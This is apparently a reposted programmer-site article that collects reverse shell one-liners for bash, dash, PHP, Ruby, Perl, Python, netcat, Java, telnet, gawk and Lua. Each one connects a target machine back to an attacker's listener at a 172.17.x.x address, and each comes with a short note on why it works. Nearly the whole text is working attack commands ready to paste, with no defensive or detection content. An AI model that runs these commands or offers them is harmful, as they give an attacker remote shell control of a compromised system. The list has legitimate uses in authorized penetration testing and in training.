
A roundup of reverse shell techniques

程序员文章站 (Programmer Article Station), 2022-07-07 19:31:19

First, start a listener on port 3000 on the attacker machine. The one-liners below use two different attacker addresses (172.17.230.33 and 172.17.154.109); substitute your own listener address and port.

nc -nvlp 3000

bash reverse shell

/dev/tcp/HOST/PORT is not a real device: bash emulates it inside its redirection code, so this needs no networking tools on the target. The combined >& redirection sends stdout and stderr to the socket and 0>&1 makes the socket stdin as well.

bash -i >& /dev/tcp/172.17.230.33/3000 0>&1

dash reverse shell

dash does not implement /dev/tcp, and its parser does not accept >& followed by a path. This line works only because it is typed into a bash shell: bash performs the redirection (opens the TCP connection) before executing dash -i, which then inherits the socket as fds 0, 1 and 2.

dash -i >& /dev/tcp/172.17.230.33/3000 0>&1

PHP reverse shell

exec() runs its argument through /bin/sh -c, so the first form only connects when /bin/sh is bash (the >& /dev/tcp redirection is bash-only). The second form opens the socket in PHP and assumes it lands on fd 3, which holds when no other descriptors are open in the PHP process.

php -r 'exec("/bin/bash -i >& /dev/tcp/172.17.154.109/3000");'
php -r '$sock=fsockopen("172.17.154.109",3000);exec("/bin/bash -i <&3 >&3 2>&3");'

ruby reverse shell

This forks into the background and runs each line received from the listener through IO.popen, sending the output back; it does not hand over an interactive shell.

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("172.17.154.109","3000");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

perl reverse shell

perl -e 'use Socket;$i="172.17.154.109";$p=3000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python reverse shell

The socket is duplicated onto fds 0, 1 and 2 with os.dup2 before the shell is started, so stdin, stdout and stderr all travel over the connection. The syntax runs unchanged under Python 2 and 3.

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('172.17.230.33',3000));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

nc reverse shell

The -e option exists only in netcat-traditional and Nmap's ncat; OpenBSD netcat, the default on Debian and Ubuntu, does not have it, which is why the next variant exists.

nc -e /bin/bash 172.17.230.33 3000

Reverse shell without -e

Create a named pipe, then have the shell read its commands from the pipe while nc writes whatever the listener sends into it. Only stdout goes back to the attacker: stderr is not redirected, so error messages stay on the target.

mknod /tmp/xm p
/bin/sh 0</tmp/xm |nc 172.17.230.33 3000 1> /tmp/xm

Java reverse shell

Runtime.exec with a String[] starts bash directly; bash opens the connection on fd 5 via /dev/tcp and then runs each line it reads from the socket, sending stdout and stderr back.

public class Revs {
    /**
     * Connect back to the listener and execute the commands it sends.
     * @param args unused
     * @throws Exception if bash cannot be started or the wait is interrupted
     */
    public static void main(String[] args) throws Exception {
        Runtime r = Runtime.getRuntime();
        // bash opens the TCP connection on fd 5 (/dev/tcp is a bash feature),
        // then reads one line at a time and runs it with stdout and stderr
        // redirected back into the socket.
        String cmd[] = {"/bin/bash", "-c",
            "exec 5<>/dev/tcp/172.17.154.109/3000;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}

Telnet reverse shell

Open two terminals on the attacker host and start a listener in each:

nc -lvvp 4444
nc -lvvp 5555

Then run the following on the target:

telnet 172.17.154.109 4444 | /bin/bash | telnet 172.17.154.109 5555

The two ports carry input and output respectively, and the address in both telnet commands is the attacker's IP. Once connected, commands typed into the terminal listening on 4444 are executed by bash on the target and their output appears in the terminal listening on 5555. As with the named-pipe variant, stderr is not redirected, so error messages remain on the target.

awk / gawk reverse shell

The /inet/tcp special file is a GNU awk extension, so this works only where awk is gawk (mawk and busybox awk lack it); invoking gawk explicitly instead of awk gives the same one-liner. The loop reads a line from the socket, runs it as a command, streams the output back, and drops the connection after the command exit.

awk 'BEGIN{s="/inet/tcp/0/172.17.154.109/3000";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}}'

lua reverse shell

Requires the LuaSocket library (require('socket')). Like the second PHP form, it assumes the new socket is fd 3 and runs the shell through os.execute, which uses /bin/sh -c; the <&3 >&3 2>&3 redirections are POSIX, so any /bin/sh will do.

lua -e "local socket=require('socket');require('os');t=socket.tcp();t:connect('172.17.154.109','3000');os.execute('/bin/sh -i <&3 >&3 2>&3');"
